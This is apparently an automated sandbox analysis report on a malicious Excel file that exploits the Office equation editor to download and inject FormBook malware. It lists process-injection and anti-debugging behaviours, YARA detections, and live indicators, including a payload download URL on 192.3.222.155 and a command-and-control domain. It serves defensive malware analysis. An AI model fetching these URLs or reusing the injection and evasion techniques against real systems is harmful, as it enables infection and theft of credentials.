Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_724888D0 rdtsc 7_2_724888D0
Enables debug privileges
Source: C:\Windows\SysWOW64\DpiScaling.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A26F8 mov eax, dword ptr fs:[00000030h] 7_2_025A26F8
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\DpiScaling.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_02590048

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\DpiScaling.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\DpiScaling.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\DpiScaling.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: DpiScaling.exe, 00000007.00000002.702380384.0000000000C00000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.637320640.0000000000750000.00000002.00020000.sdmp, Zxsdvph.exe, 00000009.00000002.686095205.0000000000840000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 9_2_00405C7C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA, 9_2_0040C2D4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA, 9_2_0040C320
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA, 9_2_004065C4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetLocaleInfoA,GetACP, 9_2_0040DA20
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 9_2_00405D87
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0040ACD8 GetLocalTime, 9_2_0040ACD8
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00452658 GetVersion, 9_2_00452658

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502159 Sample: Swift.xlsx Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 41 onedrive.live.com 2->41 43 hqpyda.bl.files.1drv.com 2->43 45 bl-files.fe.1drv.com 2->45 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Yara detected FormBook 2->53 55 8 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 27 2->15         started        signatures3 process4 dnsIp5 47 192.3.222.155, 49167, 80 AS-COLOCROSSINGUS United States 10->47 31 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->31 dropped 33 C:\Users\Public\vbc.exe, PE32 10->33 dropped 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->67 17 vbc.exe 1 16 10->17         started        file6 signatures7 process8 dnsIp9 35 onedrive.live.com 17->35 37 hqpyda.bl.files.1drv.com 17->37 39 bl-files.fe.1drv.com 17->39 29 C:\Users\Public\Libraries\...\Zxsdvph.exe, PE32 17->29 dropped 21 DpiScaling.exe 17->21         started        file10 process11 signatures12 57 Modifies the context of a thread in another process (thread injection) 21->57 59 Maps a DLL or memory area into another process 21->59 61 Tries to detect virtualization through RDTSC time measurements 21->61 63 Queues an APC in another process (thread injection) 21->63 24 explorer.exe 3 2 21->24 injected process13 process14 26 Zxsdvph.exe 24->26         started        signatures15 65 Contains functionality to detect sleep reduction / modifications 26->65
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.3.222.155
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
hqpyda.bl.files.1drv.com unknown unknown
onedrive.live.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.3.222.155/008008/vbc.exe true
  • Avira URL Cloud: safe
 unknown
www.septemberstockevent200.com/ht08/ true
  • Avira URL Cloud: safe
 low